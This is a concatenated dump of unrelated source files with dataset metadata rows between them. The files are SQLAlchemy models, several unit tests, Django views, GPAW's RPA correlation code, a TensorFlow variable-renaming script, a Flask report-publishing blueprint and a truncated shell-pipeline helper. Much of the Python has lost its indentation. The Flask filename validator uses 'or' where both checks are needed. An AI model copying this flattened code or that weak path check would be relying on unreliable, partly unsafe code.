self.dateClosed = dateClosed
self.available = available
self.supervisor_id = supervisor_id
def __repr__(self):
return '<Position {0}>'.format(self.position_id)
class ApplicationModel(Base):
'Many-to-many association table'
__tablename__ = 'app_main'
app_id = Column(Integer, primary_key=True)
position_id = Column(Integer, ForeignKey('position.position_id'), nullable=False)
student_id = Column(Integer, ForeignKey('student.student_id'), nullable=False)
student = relationship('StudentModel',primaryjoin=student_id == StudentModel.student_id)
    offer = relationship('OfferModel', backref='ApplicationModel')
    __table_args__ = (
        # Enforce one application per (position, student) pair; a bare
        # UniqueConstraint call in the class body has no effect.
        UniqueConstraint('position_id', 'student_id', name='unique_app'),
    )
def __init__(self, app_id=None,
student_id=None,
position_id=None):
self.app_id = app_id
self.position_id = position_id
self.student_id = student_id
def __repr__(self):
return '<Application {0}'.format(self.app_id)
class OfferModel(Base):
"This is a one-to-one from Application w/ Y or N"
#This can rely on the application id completely
__tablename__ = 'offer'
offer_id = Column(Integer, primary_key=True)
app_id = Column(Integer, ForeignKey('app_main.app_id'), nullable=False)
offerMade = Column(String(120))
offer_date = Column(String(120))
response = Column(String(120))
response_date = Column(String(120))
available = Column(String(120))
application = relationship('ApplicationModel',primaryjoin=app_id == ApplicationModel.app_id)
def __init__(self, offer_id=None, app_id=None,
offerMade=None, offer_date=None,
response=None, response_date=None,
available=None):
self.offer_id = offer_id
self.app_id = app_id
self.offerMade = offerMade
self.offer_date = offer_date
self.response = response
self.response_date = response_date
self.available = available
def __repr__(self):
return '<Offer {0}'.format(self.offer_id)
#The applications table is a many-to-many relationship
#https://pythonhosted.org/Flask-SQLAlchemy/models.html
#suggests using an explicit table
#http://docs.sqlalchemy.org/en/rel_0_9/orm/relationships.html#relationships-many-to-many
#http://docs.sqlalchemy.org/en/rel_0_9/core/constraints.html?highlight=constraints
#http://stackoverflow.com/questions/10059345/sqlalchemy-unique-across-multiple-columns
#This table should have a composite primary key on (student_id, position_id),
#which would eliminate the need for the unique constraint.
#However, what if a person rescinds an application and then reapplies?
#Do we allow this? If so, we need to add a submission time/date stamp.
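# A minimal sketch of that composite-primary-key alternative; the class name,
# table name, and timestamp column are illustrative assumptions, not part of
# the original schema:
class ApplicationAltModel(Base):
    __tablename__ = 'app_main_alt'
    position_id = Column(Integer, ForeignKey('position.position_id'),
                         primary_key=True)
    student_id = Column(Integer, ForeignKey('student.student_id'),
                        primary_key=True)
    # The composite PK makes (position_id, student_id) unique by construction,
    # so no separate UniqueConstraint is needed.
    submitted_at = Column(String(120))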
deployed/internal_links | internal_links/tests.py | 1 | 1317 | # encoding: utf-8
import unittest
from .helpers import insert_links_to_text, find_text_occurrences
class TestFindText(unittest.TestCase):
def test_find_text_occurrences(self):
text_dict = {'content': 'Ok, Ala ma kota, ala kota tez ma, ale ola nie ma kota tak jak ala'}
self.assertEqual(find_text_occurrences('Ala', text_dict)[0]['word'], 'Ala')
class TestInsertLinks(unittest.TestCase):
def setUp(self):
self.result_text = 'Ok, <a href="http://ala.com" alt="Ala" title="Ala">Ala</a> ma kota, ' \
'<a href="http://ala.com" alt="Ala" title="Ala">Ala</a> kota tez ma, ale ola nie ma kota ' \
'tak jak <a href="http://ala.com" alt="Ala" title="Ala">Ala</a>'
def test_insert_links_to_text(self):
text_dict = {'content': 'Ok, Ala ma kota, ala kota tez ma, ale ola nie ma kota tak jak ala',
'modified': False}
matches = [{'word': 'Ala', 'start': 4, 'end': 7},
{'word': 'Ala', 'start': 17, 'end': 20},
{'word': 'Ala', 'start': 62, 'end': 65}]
self.assertEqual(insert_links_to_text(text_dict, matches, "http://ala.com")['content'], self.result_text)
self.assertTrue(insert_links_to_text(text_dict, matches, "http://ala.com")['modified'])
| mit | 199,016,406,607,265,800 | 47.777778 | 119 | 0.579347 | false | 3.048611 | true | false | false |
direvius/yandex-tank | tests/TankCore_Test.py | 2 | 1254 | import unittest
from Tank_Test import TankTestCase
import yandextank.core as tankcore
class TankCoreTestCase(TankTestCase):
def setUp(self):
self.foo = tankcore.TankCore()
def tearDown(self):
del self.foo
self.foo = None
def test_tankcorefail(self):
paths = ['config_err/load_err.conf']
self.foo.load_configs(paths)
try:
self.foo.load_plugins()
self.fail()
except ImportError:
pass
def test_tankcore(self):
paths = ['config/load.conf']
self.foo.load_configs(paths)
self.assertEquals('passed', self.foo.get_option('dotted', 'test'))
self.foo.load_plugins()
self.foo.plugins_configure()
self.foo.plugins_prepare_test()
self.foo.plugins_start_test()
self.foo.wait_for_finish()
self.foo.add_artifact_file(__file__, 1)
self.foo.plugins_end_test(0)
self.foo.plugins_post_process(0)
    def test_strsplit(self):
str1 = '-Jtarget.address=www.yandex.ru -Jtarget.port=26 -J "load_profile=const(1,60s) line(0,1000,10m)"'
arr1 = tankcore.splitstring(str1)
self.assertEquals(len(arr1), 5)
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | 8,863,918,829,289,162,000 | 26.866667 | 112 | 0.606061 | false | 3.335106 | true | false | false |
eklinger-UofA/3DOrthotics | orthotics_project/clients/views.py | 1 | 1074 | from django.shortcuts import render_to_response
from django.http import HttpResponse
from django.template import RequestContext
from clients.models import Client, Dependent
def index(request):
context = RequestContext(request)
client_list = Client.objects.all()
client_dict = {'clients': client_list}
return render_to_response('clients/index.html', client_dict, context)
def clientView(request, client_id):
context = RequestContext(request)
client = Client.objects.get(id=client_id)
insurance = client.insurance_set.all()
dependents = client.dependents.all()
spouse = None
children = []
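    # Partition dependents: at most one spouse; everyone else is a child.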
for dependent in dependents:
if dependent.relationship == Dependent.SPOUSE:
spouse = dependent
else:
children.append(dependent)
context_dict = {'client': client,
'client_insurance': insurance,
'spouse': spouse,
'children': children}
return render_to_response('clients/client.html', context_dict, context)
| apache-2.0 | 3,895,278,928,022,930,000 | 30.588235 | 75 | 0.667598 | false | 4.195313 | false | false | false |
robwarm/gpaw-symm | gpaw/xc/rpa.py | 1 | 15513 | from __future__ import print_function
import os
import sys
from time import ctime
import numpy as np
from ase.units import Hartree
from ase.utils import devnull
from scipy.special.orthogonal import p_roots
from gpaw import GPAW
import gpaw.mpi as mpi
from gpaw.response.chi0 import Chi0
from gpaw.wavefunctions.pw import PWDescriptor
from gpaw.kpt_descriptor import KPointDescriptor
class RPACorrelation:
def __init__(self, calc, xc='RPA', filename=None,
skip_gamma=False, qsym=True, nlambda=None,
nfrequencies=16, frequency_max=800.0, frequency_scale=2.0,
frequencies=None, weights=None,
wcomm=None, chicomm=None, world=mpi.world,
txt=sys.stdout):
if isinstance(calc, str):
calc = GPAW(calc, txt=None, communicator=mpi.serial_comm)
self.calc = calc
if world.rank != 0:
txt = devnull
elif isinstance(txt, str):
txt = open(txt, 'w')
self.fd = txt
if frequencies is None:
frequencies, weights = get_gauss_legendre_points(nfrequencies,
frequency_max,
frequency_scale)
user_spec = False
else:
assert weights is not None
user_spec = True
self.omega_w = frequencies / Hartree
self.weight_w = weights / Hartree
if wcomm is None:
wcomm = 1
if isinstance(wcomm, int):
if wcomm == 1:
wcomm = mpi.serial_comm
chicomm = world
else:
r = world.rank
s = world.size
assert s % wcomm == 0
                n = s // wcomm  # size of chicomm
wcomm = world.new_communicator(range(r % n, s, n))
chicomm = world.new_communicator(range(r // n * n,
(r // n + 1) * n))
assert len(self.omega_w) % wcomm.size == 0
self.mynw = len(self.omega_w) // wcomm.size
self.w1 = wcomm.rank * self.mynw
self.w2 = self.w1 + self.mynw
self.myomega_w = self.omega_w[self.w1:self.w2]
self.wcomm = wcomm
self.chicomm = chicomm
self.world = world
self.skip_gamma = skip_gamma
self.ibzq_qc = None
self.weight_q = None
self.initialize_q_points(qsym)
        # Energies for all q-vectors and cutoff energies:
self.energy_qi = []
self.filename = filename
self.print_initialization(xc, frequency_scale, nlambda, user_spec)
def initialize_q_points(self, qsym):
kd = self.calc.wfs.kd
self.bzq_qc = kd.get_bz_q_points(first=True)
if not qsym:
self.ibzq_qc = self.bzq_qc
self.weight_q = np.ones(len(self.bzq_qc)) / len(self.bzq_qc)
else:
U_scc = kd.symmetry.op_scc
self.ibzq_qc = kd.get_ibz_q_points(self.bzq_qc, U_scc)[0]
self.weight_q = kd.q_weights
def read(self):
lines = open(self.filename).readlines()[1:]
n = 0
self.energy_qi = []
nq = len(lines) // len(self.ecut_i)
for q_c in self.ibzq_qc[:nq]:
self.energy_qi.append([])
for ecut in self.ecut_i:
q1, q2, q3, ec, energy = [float(x)
for x in lines[n].split()]
self.energy_qi[-1].append(energy / Hartree)
n += 1
if (abs(q_c - (q1, q2, q3)).max() > 1e-4 or
abs(int(ecut * Hartree) - ec) > 0):
self.energy_qi = []
return
print('Read %d q-points from file: %s' % (nq, self.filename),
file=self.fd)
print(file=self.fd)
def write(self):
if self.world.rank == 0 and self.filename:
fd = open(self.filename, 'w')
print('#%9s %10s %10s %8s %12s' %
('q1', 'q2', 'q3', 'E_cut', 'E_c(q)'), file=fd)
for energy_i, q_c in zip(self.energy_qi, self.ibzq_qc):
for energy, ecut in zip(energy_i, self.ecut_i):
print('%10.4f %10.4f %10.4f %8d %r' %
(tuple(q_c) + (ecut * Hartree, energy * Hartree)),
file=fd)
def calculate(self, ecut, nbands=None, spin=0):
"""Calculate RPA correlation energy for one or several cutoffs.
ecut: float or list of floats
Plane-wave cutoff(s).
nbands: int
Number of bands (defaults to number of plane-waves).
        spin: separate spin in response function.
(Only needed for beyond RPA methods that inherit this function)
"""
if isinstance(ecut, (float, int)):
ecut_i = [ecut]
for i in range(5):
ecut_i.append(ecut_i[-1] * 0.8)
ecut_i = np.sort(ecut_i)
else:
ecut_i = np.sort(ecut)
self.ecut_i = np.asarray(ecut_i) / Hartree
ecutmax = max(self.ecut_i)
if nbands is None:
print('Response function bands : Equal to number of plane waves',
file=self.fd)
else:
print('Response function bands : %s' % nbands, file=self.fd)
print('Plane wave cutoffs (eV) :', end='', file=self.fd)
for ecut in ecut_i:
print('%5d' % ecut, end='', file=self.fd)
print(file=self.fd)
print(file=self.fd)
if self.filename and os.path.isfile(self.filename):
self.read()
self.world.barrier()
chi0 = Chi0(self.calc, 1j * Hartree * self.myomega_w, eta=0.0,
intraband=False, hilbert=False,
txt='response.txt', world=self.chicomm)
nq = len(self.energy_qi)
for q_c in self.ibzq_qc[nq:]:
if np.allclose(q_c, 0.0) and self.skip_gamma:
self.energy_qi.append(len(self.ecut_i) * [0.0])
self.write()
print('Not calculating E_c(q) at Gamma', file=self.fd)
print(file=self.fd)
continue
thisqd = KPointDescriptor([q_c])
pd = PWDescriptor(ecutmax, self.calc.wfs.gd, complex, thisqd)
nG = pd.ngmax
chi0_swGG = np.zeros((1 + spin, self.mynw, nG, nG), complex)
if np.allclose(q_c, 0.0):
# Wings (x=0,1) and head (G=0) for optical limit and three
# directions (v=0,1,2):
chi0_swxvG = np.zeros((1 + spin, self.mynw, 2, 3, nG), complex)
chi0_swvv = np.zeros((1 + spin, self.mynw, 3, 3), complex)
else:
chi0_swxvG = None
chi0_swvv = None
Q_aGii = chi0.initialize_paw_corrections(pd)
# First not completely filled band:
m1 = chi0.nocc1
print('# %s - %s' % (len(self.energy_qi), ctime().split()[-2]),
file=self.fd)
print('q = [%1.3f %1.3f %1.3f]' % tuple(q_c), file=self.fd)
energy_i = []
for ecut in self.ecut_i:
if ecut == ecutmax:
# Nothing to cut away:
cut_G = None
m2 = nbands or nG
else:
cut_G = np.arange(nG)[pd.G2_qG[0] <= 2 * ecut]
m2 = len(cut_G)
print('E_cut = %d eV / Bands = %d: ' % (ecut * Hartree, m2),
file=self.fd, end='')
self.fd.flush()
energy = self.calculate_q(chi0, pd,
chi0_swGG, chi0_swxvG, chi0_swvv,
Q_aGii, m1, m2, cut_G)
energy_i.append(energy)
m1 = m2
if ecut < ecutmax and self.chicomm.size > 1:
# Chi0 will be summed again over chicomm, so we divide
# by its size:
chi0_swGG *= 1.0 / self.chicomm.size
if chi0_swxvG is not None:
chi0_swxvG *= 1.0 / self.chicomm.size
chi0_swvv *= 1.0 / self.chicomm.size
self.energy_qi.append(energy_i)
self.write()
print(file=self.fd)
e_i = np.dot(self.weight_q, np.array(self.energy_qi))
print('==========================================================',
file=self.fd)
print(file=self.fd)
print('Total correlation energy:', file=self.fd)
for e_cut, e in zip(self.ecut_i, e_i):
print('%6.0f: %6.4f eV' % (e_cut * Hartree, e * Hartree),
file=self.fd)
print(file=self.fd)
self.energy_qi = [] # important if another calculation is performed
if len(e_i) > 1:
self.extrapolate(e_i)
print('Calculation completed at: ', ctime(), file=self.fd)
print(file=self.fd)
return e_i * Hartree
def calculate_q(self, chi0, pd,
chi0_swGG, chi0_swxvG, chi0_swvv, Q_aGii, m1, m2, cut_G):
chi0_wGG = chi0_swGG[0]
if chi0_swxvG is not None:
chi0_wxvG = chi0_swxvG[0]
chi0_wvv = chi0_swvv[0]
else:
chi0_wxvG = None
chi0_wvv = None
chi0._calculate(pd, chi0_wGG, chi0_wxvG, chi0_wvv,
Q_aGii, m1, m2, [0, 1])
print('E_c(q) = ', end='', file=self.fd)
if not pd.kd.gamma:
e = self.calculate_energy(pd, chi0_wGG, cut_G)
print('%.3f eV' % (e * Hartree), file=self.fd)
self.fd.flush()
else:
e = 0.0
for v in range(3):
chi0_wGG[:, 0] = chi0_wxvG[:, 0, v]
chi0_wGG[:, :, 0] = chi0_wxvG[:, 1, v]
chi0_wGG[:, 0, 0] = chi0_wvv[:, v, v]
ev = self.calculate_energy(pd, chi0_wGG, cut_G)
e += ev
print('%.3f' % (ev * Hartree), end='', file=self.fd)
if v < 2:
print('/', end='', file=self.fd)
else:
print(' eV', file=self.fd)
self.fd.flush()
e /= 3
return e
def calculate_energy(self, pd, chi0_wGG, cut_G):
"""Evaluate correlation energy from chi0."""
G_G = pd.G2_qG[0]**0.5 # |G+q|
if pd.kd.gamma:
G_G[0] = 1.0
if cut_G is not None:
G_G = G_G[cut_G]
nG = len(G_G)
e_w = []
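        # Per-frequency integrand of the RPA correlation energy,
        # Tr[ln(1 - v chi0) + v chi0], with e_GG = 1 - v chi0 in plane waves.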
for chi0_GG in chi0_wGG:
if cut_G is not None:
chi0_GG = chi0_GG.take(cut_G, 0).take(cut_G, 1)
e_GG = np.eye(nG) - 4 * np.pi * chi0_GG / G_G / G_G[:, np.newaxis]
e = np.log(np.linalg.det(e_GG)) + nG - np.trace(e_GG)
e_w.append(e.real)
E_w = np.zeros_like(self.omega_w)
self.wcomm.all_gather(np.array(e_w), E_w)
energy = np.dot(E_w, self.weight_w) / (2 * np.pi)
self.E_w = E_w
return energy
def extrapolate(self, e_i):
print('Extrapolated energies:', file=self.fd)
ex_i = []
for i in range(len(e_i) - 1):
e1, e2 = e_i[i:i + 2]
x1, x2 = self.ecut_i[i:i + 2]**-1.5
ex = (e1 * x2 - e2 * x1) / (x2 - x1)
ex_i.append(ex)
print(' %4.0f -%4.0f: %5.3f eV' % (self.ecut_i[i] * Hartree,
self.ecut_i[i + 1] * Hartree,
ex * Hartree),
file=self.fd)
print(file=self.fd)
self.fd.flush()
return e_i * Hartree
def print_initialization(self, xc, frequency_scale, nlambda, user_spec):
print('----------------------------------------------------------',
file=self.fd)
print('Non-self-consistent %s correlation energy' % xc, file=self.fd)
print('----------------------------------------------------------',
file=self.fd)
print('Started at: ', ctime(), file=self.fd)
print(file=self.fd)
print('Atoms :',
self.calc.atoms.get_chemical_formula(mode='hill'), file=self.fd)
print('Ground state XC functional :',
self.calc.hamiltonian.xc.name, file=self.fd)
print('Valence electrons :',
self.calc.wfs.setups.nvalence, file=self.fd)
print('Number of bands :',
self.calc.wfs.bd.nbands, file=self.fd)
print('Number of spins :',
self.calc.wfs.nspins, file=self.fd)
print('Number of k-points :',
len(self.calc.wfs.kd.bzk_kc), file=self.fd)
print('Number of irreducible k-points :',
len(self.calc.wfs.kd.ibzk_kc), file=self.fd)
print('Number of q-points :',
len(self.bzq_qc), file=self.fd)
print('Number of irreducible q-points :',
len(self.ibzq_qc), file=self.fd)
print(file=self.fd)
for q, weight in zip(self.ibzq_qc, self.weight_q):
print(' q: [%1.4f %1.4f %1.4f] - weight: %1.3f' %
(q[0], q[1], q[2], weight), file=self.fd)
print(file=self.fd)
print('----------------------------------------------------------',
file=self.fd)
print('----------------------------------------------------------',
file=self.fd)
print(file=self.fd)
if nlambda is None:
print('Analytical coupling constant integration', file=self.fd)
else:
print('Numerical coupling constant integration using', nlambda,
'Gauss-Legendre points', file=self.fd)
print(file=self.fd)
print('Frequencies', file=self.fd)
if not user_spec:
print(' Gauss-Legendre integration with %s frequency points' %
len(self.omega_w), file=self.fd)
print(' Transformed from [0,oo] to [0,1] using e^[-aw^(1/B)]',
file=self.fd)
print(' Highest frequency point at %5.1f eV and B=%1.1f' %
(self.omega_w[-1] * Hartree, frequency_scale), file=self.fd)
else:
print(' User specified frequency integration with',
len(self.omega_w), 'frequency points', file=self.fd)
print(file=self.fd)
print('Parallelization', file=self.fd)
print(' Total number of CPUs : % s' % self.world.size,
file=self.fd)
print(' Frequency decomposition : % s' % self.wcomm.size,
file=self.fd)
print(' K-point/band decomposition : % s' % self.chicomm.size,
file=self.fd)
print(file=self.fd)
def get_gauss_legendre_points(nw=16, frequency_max=800.0, frequency_scale=2.0):
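    # Map Gauss-Legendre nodes from [-1, 1] onto [0, frequency_max] through
    # w = (-ln(1 - y))**frequency_scale, clustering points at low frequency;
    # the weights pick up the Jacobian of this transformation.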
y_w, weights_w = p_roots(nw)
y_w = y_w.real
ys = 0.5 - 0.5 * y_w
ys = ys[::-1]
w = (-np.log(1 - ys))**frequency_scale
w *= frequency_max / w[-1]
alpha = (-np.log(1 - ys[-1]))**frequency_scale / frequency_max
transform = (-np.log(1 - ys))**(frequency_scale - 1) \
/ (1 - ys) * frequency_scale / alpha
return w, weights_w * transform / 2
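# A minimal usage sketch (assumed, not from the original module): given a
# ground-state calculation saved as 'gs.gpw',
#
#     rpa = RPACorrelation('gs.gpw', txt='rpa.txt')
#     e_i = rpa.calculate(ecut=400.0)
#
# returns the correlation energy (in eV) for a ladder of cutoffs up to 400 eV;
# with more than one cutoff, extrapolated energies are also written to the log.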
| gpl-3.0 | -8,841,506,788,400,135,000 | 36.929095 | 79 | 0.474634 | false | 3.340439 | false | false | false |
justanothercoder/LSTM-Optimizer-TF | scripts/tensorflow_rename_variables.py | 1 | 2707 | import os
os.environ["CUDA_VISIBLE_DEVICES"] = ""
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import sys, getopt
import tensorflow as tf
usage_str = 'python tensorflow_rename_variables.py --checkpoint_dir=path/to/dir/ ' \
'--replace_from=substr --replace_to=substr --add_prefix=abc --dry_run'
def rename(checkpoint_dir, replace_from, replace_to, add_prefix, dry_run):
checkpoint = tf.train.get_checkpoint_state(checkpoint_dir)
with tf.Session() as sess:
for var_name, _ in tf.contrib.framework.list_variables(checkpoint_dir):
# Load the variable
var = tf.contrib.framework.load_variable(checkpoint_dir, var_name)
print(var_name)
# Set the new name
new_name = var_name
if None not in [replace_from, replace_to]:
new_name = new_name.replace(replace_from, replace_to)
if add_prefix:
new_name = add_prefix + new_name
#if new_name == var_name:
# continue
if dry_run:
if var_name != new_name:
print('%s would be renamed to %s.' % (var_name, new_name))
else:
if var_name != new_name:
print('Renaming %s to %s.' % (var_name, new_name))
# Rename the variable
var = tf.Variable(var, name=new_name)
if not dry_run:
# Save the variables
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
saver.save(sess, checkpoint.model_checkpoint_path)
def main(argv):
checkpoint_dir = None
replace_from = None
replace_to = None
add_prefix = None
dry_run = False
try:
opts, args = getopt.getopt(argv, 'h', ['help=', 'checkpoint_dir=', 'replace_from=',
'replace_to=', 'add_prefix=', 'dry_run'])
except getopt.GetoptError:
print(usage_str)
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print(usage_str)
sys.exit()
elif opt == '--checkpoint_dir':
checkpoint_dir = arg
elif opt == '--replace_from':
replace_from = arg
elif opt == '--replace_to':
replace_to = arg
elif opt == '--add_prefix':
add_prefix = arg
elif opt == '--dry_run':
dry_run = True
if not checkpoint_dir:
print('Please specify a checkpoint_dir. Usage:')
print(usage_str)
sys.exit(2)
rename(checkpoint_dir, replace_from, replace_to, add_prefix, dry_run)
if __name__ == '__main__':
main(sys.argv[1:])
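# Hedged example invocation (added for illustration): a dry run prints the
# planned renames without rewriting the checkpoint, e.g.
#   python tensorflow_rename_variables.py --checkpoint_dir=./ckpt/ \
#       --replace_from=lstm --replace_to=rnn --dry_run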
| mit | -4,302,017,214,150,975,500 | 31.614458 | 91 | 0.536757 | false | 3.812676 | false | false | false |
mozilla/user-advocacy | flask/useradvocacy/reports/views.py | 1 | 12475 | # -*- coding: utf-8 -*-
'''Templating engine for reports'''
from flask import (current_app, Flask, Blueprint, request, render_template, url_for, flash, redirect, session, send_from_directory, safe_join, Response, jsonify)
from werkzeug.exceptions import Unauthorized, Forbidden, NotFound, BadRequest, Conflict
from useradvocacy.extensions import login_manager
from flask.ext.login import current_user
from useradvocacy.user.models import User
from useradvocacy.database import db
from useradvocacy.reports.models import User, Template, Report
from .forms import EditorForm, SelectorForm, PreviewForm
from useradvocacy.utils import flash_errors, check_admin
import os
import re
import flask.json
from functools import wraps
from werkzeug.utils import secure_filename
from .markdown2html import convert_md
import shutil
from flask.ext.login import login_required
blueprint = Blueprint('reports', __name__, static_folder="./static",
url_prefix="/reports", template_folder="./templates")
def upload_path():
if current_app.config['UPLOAD_PATH']:
upload = os.path.join(current_app.config['UPLOAD_PATH'], 'reports')
else:
upload = os.path.join(current_app.root_path, 'reports', 'uploads')
print upload
return upload
def validate_project_filename(fn):
@wraps(fn)
def new_fn(project, filename, *args, **kwargs):
if re.match('[a-zA-Z0-9_-]+$',project) or re.match('[a-zA-Z0-9_-]+$',filename):
return fn(project, filename, *args, **kwargs)
else:
raise BadRequest()
return new_fn
def allowed_file(name):
if re.match('[^/.\'\\\\"]+\\.(css|js|png|jpg|jpeg|gif|json|csv|tsv|xml|pdf|key)$', name, flags=re.IGNORECASE):
return True
else:
return False
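# Hedged examples (added for illustration): allowed_file("plot.png") and
# allowed_file("data.json") return True; allowed_file("../evil.js") and
# allowed_file("page.php") return False, since the pattern rejects path
# separators, extra dots, quotes, and extensions outside the whitelist.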
@blueprint.route("/", methods=["GET"])
def home():
reports = Report.query.order_by("updated").all()
reports.reverse()
projects = db.session.query(Report.project.label('name'), db.func.bit_or(db.and_(Report.published, Report.listed)).label('shown')).group_by('name').all()
print projects[0].shown
return render_template('reports.html', list = reports, projects = projects)
@blueprint.route("/css/<file>", methods=["GET"])
def serve_css(file):
return send_from_directory(safe_join(current_app.root_path, "reports/static/css"), file)
@blueprint.route("/img/<file>", methods=["GET"])
def serve_img(file):
return send_from_directory(safe_join(current_app.root_path, "reports/static/img"), file)
@blueprint.route("/js/<file>", methods=["GET"])
def serve_js(file):
return send_from_directory(safe_join(current_app.root_path, "reports/static/js"), file)
@blueprint.route("/edit", methods=["GET", "POST"])
@login_required
@check_admin
def selector():
form = SelectorForm()
if request.method == 'POST':
if form.validate_on_submit():
if form.action == "report":
return redirect('/reports/' + form.project + '/' + form.filename
+ '/edit', 302)
if form.action == "rerender":
reports = Report.query.all()
for report in reports:
report.save_render_html()
else:
flash_errors(form)
return render_template('selector.html',form=form)
# TODO: rewrite API.json to take parameters instead of just returning.
# TODO: return metadata along with individual reports.
# (see also: home_project_api())
@blueprint.route("/api.json", methods=["GET"])
def home_api():
reports = Report.query.order_by("updated").limit(100).all()
result = []
for report in reports:
if (not (current_user and current_user.is_authenticated() and
current_user.is_admin)
and not report.published):
continue
item = {
'path' : url_for(".home") + str(report),
'filename' : report.filename,
'project' : report.project,
'created' : report.created,
'updated' : report.updated,
'title' : report.title
}
result.append(item)
return jsonify(results = result)
@blueprint.route("/<project>/", methods=["GET"])
def home_project(project):
return redirect(url_for(".home") + "#" + project)
@blueprint.route("/<project>/api.json", methods=["GET"])
def home_project_api(project):
reports = Report.query.filter_by(project = project).order_by("updated").all()
result = []
for report in reports:
if (not (current_user and current_user.is_authenticated() and
current_user.is_admin)
and not report.published):
continue
item = {
'path' : url_for(".home") + str(report),
'filename' : report.filename,
'project' : report.project,
'created' : report.created,
'updated' : report.updated,
'title' : report.title
}
result.append(item)
return jsonify(results = result)
@blueprint.route("/<project>/<filename>/", methods=["GET", "POST"])
@validate_project_filename
def display(project, filename):
report = Report.query.filter_by(filename = filename, project = project).first()
if report:
if report.published or (not current_user.is_anonymous() and
current_user.is_admin):
return report.html_content
else:
raise NotFound()
else:
raise NotFound()
@blueprint.route("/<project>/<filename>/edit", methods=["GET", "POST"])
@validate_project_filename
@login_required
@check_admin
def edit(project, filename):
template_name = request.args.get('template', 'default')
report = Report.query.filter_by(project = project, filename = filename).first()
default_template = Template.query.filter_by(name = template_name).first()
form = None
if report:
form = EditorForm(project_field=project, filename_field=filename,
template_field = report.template, markdown_field=report.md_content,
published_field = report.published, listed_field = report.listed)
else:
form = EditorForm(project_field=project, filename_field=filename,
template_field = default_template, markdown_field=default_template.md_content)
if request.method == 'POST':
if form.validate_on_submit():
save_user = None
if current_user.is_anonymous():
save_user = User.query.filter_by(username="<blank>").first()
else:
save_user = current_user
            if form.savemode == 'save':
report = Report.query.filter_by(filename = form.filename,
project = form.project).first()
if report:
report.update(template_id = form.template.id,
md_content = form.md_content,
listed = form.listed,
published = form.published)
flash("Report saved.", 'success')
else:
report = Report.create(filename = form.filename,
project = form.project, template = form.template,
md_content = form.md_content, author = save_user,
listed = form.listed, published = form.published)
flash("New report created and saved!", 'success')
report.save_render_html()
form = EditorForm(project_field=form.project,
filename_field=form.filename, template_field=form.template,
markdown_field = form.md_content, listed_field = form.listed,
published_field = form.published)
elif form.savemode is "saveas":
report = Report.create(filename = form.filename,
project = form.project, template = form.template,
md_content = form.md_content, author = save_user,
listed = form.listed, published = form.published)
report.save_render_html()
old_path = os.path.join(upload_path(), form.old_project,
form.old_filename)
new_path = os.path.join(upload_path(), form.project,
form.filename)
# Move files along with copying data
try:
files = os.listdir(old_path)
except OSError:
pass
else:
if os.path.exists(new_path):
flash("Files not copied!", 'error')
else:
shutil.copytree(old_path, new_path)
flash("Files copied!", 'success')
flash("New report created and saved!", 'success')
return redirect("/reports/" + form.project + "/" +
form.filename + "/edit", 303)
else:
assert False
else:
flash_errors(form)
preview_form = PreviewForm(markdown_preview_field = '', template_preview_field = '')
return render_template('editor.html',form=form, project=project,
filename=filename, preview_form=preview_form)
@blueprint.route("/<project>/<filename>/upload", methods=["POST"])
@validate_project_filename
@login_required
@check_admin
def upload_file(project, filename):
file = request.files['file']
if file and allowed_file(file.filename):
file_save = secure_filename(file.filename)
try:
os.makedirs(os.path.join(upload_path(), project, filename))
except OSError:
pass
try:
file.save(os.path.join(upload_path(), project, filename, file_save))
        except (IOError, OSError) as err:
            flash("Can't save file: " + err.strerror, 'error')
            raise Conflict("Can't save file: " + err.strerror)
else:
return "File uploaded", 200
else:
raise Conflict("File upload failed: File not allowed")
raise Conflict("Bad file upload!")
@blueprint.route("/<project>/<filename>/preview", methods=["POST"])
@validate_project_filename
def preview_file(project, filename):
preview_form = PreviewForm()
if preview_form.validate_on_submit():
print preview_form.template_id
template_id = Template.query.get(preview_form.template_id)
md_content = preview_form.md_content
env = current_app.create_jinja_environment()
template = env.get_template(template_id.filename)
print template
return convert_md(md_content, template)
else:
        raise NotFound()
@blueprint.route("/<project>/<filename>/listfiles", methods=["GET"])
@validate_project_filename
@login_required
@check_admin
def list_files(project, filename):
try:
files = os.listdir(os.path.join(upload_path(), project, filename))
except OSError:
return Response(flask.json.dumps([]), status=200, mimetype='application/json')
out_list = []
for file_name in files:
file_item = {
"name": file_name,
"size": os.path.getsize(os.path.join(upload_path(), project,
filename))
}
out_list.append(file_item)
return Response(flask.json.dumps(out_list), status=200, mimetype='application/json')
@blueprint.route("/<project>/<filename>/md", methods=["GET"])
@validate_project_filename
def display_md(project, filename):
report = Report.query.filter_by(filename = filename, project = project).first()
if report:
return Response(report.md_content, mimetype = 'text/plain', status = 200)
else:
raise NotFound()
# Keep this function last as it sucks up everything else in /reports/
@blueprint.route("/<project>/<filename>/<file>", methods=["GET"])
@validate_project_filename
def file_server(project, filename, file):
return send_from_directory(os.path.join(upload_path(), project, filename), file)
@blueprint.route("/<project>/<filename>/<file>/delete", methods=["DELETE"])
@validate_project_filename
@login_required
@check_admin
def delete_file(project, filename, file):
if not allowed_file(file):
raise BadRequest()
if os.path.exists(os.path.join(upload_path(), project, filename,file)):
os.remove(os.path.join(upload_path(), project, filename,file))
return "File removed", 200
else:
raise NotFound()
| mpl-2.0 | -5,215,486,145,157,596,000 | 38.603175 | 161 | 0.607214 | false | 4.035911 | false | false | false |
eske/seq2seq | scripts/multi-print.py | 1 | 1271 | #!/usr/bin/python3
import argparse
import sys
import subprocess
import re
parser = argparse.ArgumentParser()
parser.add_argument('files', nargs='+')
parser.add_argument('--head', action='store_true')
parser.add_argument('--shuf', action='store_true')
parser.add_argument('-n', type=int)
parser.add_argument('-d', '--delimiter', default='^', choices=['&', '^', '@', '~', '|', '/', '#', '$'])
parser.add_argument('--space', action='store_true')
args = parser.parse_args()
commands = []
paste = ['paste', '-d', args.delimiter] + list(args.files)
commands.append(paste)
if args.shuf:
shuf = ['shuf']
if args.n:
shuf += ['-n', str(args.n)]
commands.append(shuf)
if args.head:
head = ['head', '-n', str(args.n or 10)]
commands.append(head)
if args.space:
space = ['sed', 'G']
commands.append(space)
delimiter = re.escape(args.delimiter) if args.delimiter in ('/', '^', '$') else args.delimiter
sed = ['sed', 's/{}/\\n/g'.format(delimiter)]
commands.append(sed)
ps = None
for i, cmd in enumerate(commands):
stdout = sys.stdout if i == len(commands) - 1 else subprocess.PIPE
stdin = None if i == 0 else ps.stdout
